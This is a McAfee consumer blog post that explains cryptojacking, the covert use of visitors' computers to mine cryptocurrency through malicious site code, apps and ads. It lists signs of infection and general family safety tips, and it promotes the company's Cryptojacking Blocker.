Whoa, let’s back up. What’s cryptocurrency, and why would people steal other people’s computing power to get it? Cryptocurrencies are virtual coins that have a real monetary value attached to them. Each transaction is verified and added to a public ledger (also called a blockchain), which cannot be altered without redoing the work that secured it. Transactions are bundled into blocks by cryptocurrency miners, who compete with one another to solve a computationally expensive puzzle attached to each block. The reward for solving it is newly issued coins (bitcoin, in Bitcoin’s case), which in the crypto world can be worth thousands of dollars.

Power Surge

Here’s the catch: to solve these puzzles and get to crypto gold, miners need far more hardware power than the average user possesses. So inserting malicious code into websites, apps, and ads, and hoping you click, lets malicious crypto miners siphon power from other people’s computers without their consent.

While mining cryptocurrency can be a harmless hobby, when malware or site code is used to drain an unsuspecting user’s CPU power it is considered cryptojacking, and it’s becoming more common.

Are you feeling a bit vulnerable? You aren’t alone. According to the most recent McAfee Labs Threats Report, cryptojacking has grown more than 4,000% in the past year.

Have you been hit?

One sign that you’ve been affected is that your computer or smartphone may slow down or have more glitches than normal. Crypto mining code runs quietly in the background while you go about your everyday work or browsing and it can go undetected for a long time.

How to prevent cryptojacking

Be proactive. Your first line of defense against a malware attack is to use a comprehensive security solution on your family computers and to keep that software updated.

Cryptojacking Blocker. This new McAfee product zeroes in on the cryptojacking threat and helps prevent websites from mining for cryptocurrency (see graphic below). Cryptojacking Blocker is included in all McAfee suites that include McAfee WebAdvisor. Users can update their existing WebAdvisor software to get Cryptojacking Blocker or download WebAdvisor for free.

Cryptojacking Rising

Discuss it with your family. Cryptojacking is a wild concept to explain or discuss at the dinner table, but kids need to fully understand the digital landscape and their responsibility in it. Discuss their role in helping to keep the family safe online and the motives of the bad guys who are always lurking in the background.

Smart clicks. One way illicit crypto miners get to your PC is through malicious links sent in legitimate-looking emails. Be aware of this scam (and many others) and think before you click on any links sent via email.

Stick with the legit. If a website, an app, or a pop-up looks suspicious, it could contain malware or JavaScript that starts mining the moment the page loads. Stick with reputable sites and apps and be extra cautious with how you interact with pop-ups.

Install updates immediately. Be sure to keep all your system software up-to-date when alerted to do so. This will help close any security gaps that hackers can exploit.

Strong passwords. These little combinations are critical to your family’s digital safety and can’t be ignored. Create unique passwords for different accounts and be sure to change out those passwords periodically.

To stay on top of the latest consumer and security threats that could impact your family, be sure to listen to our podcast Hackable? And, like us on Facebook.

The post Cryptojacking Up 4,000% How You Can Block the Bad Guys appeared first on McAfee Blogs.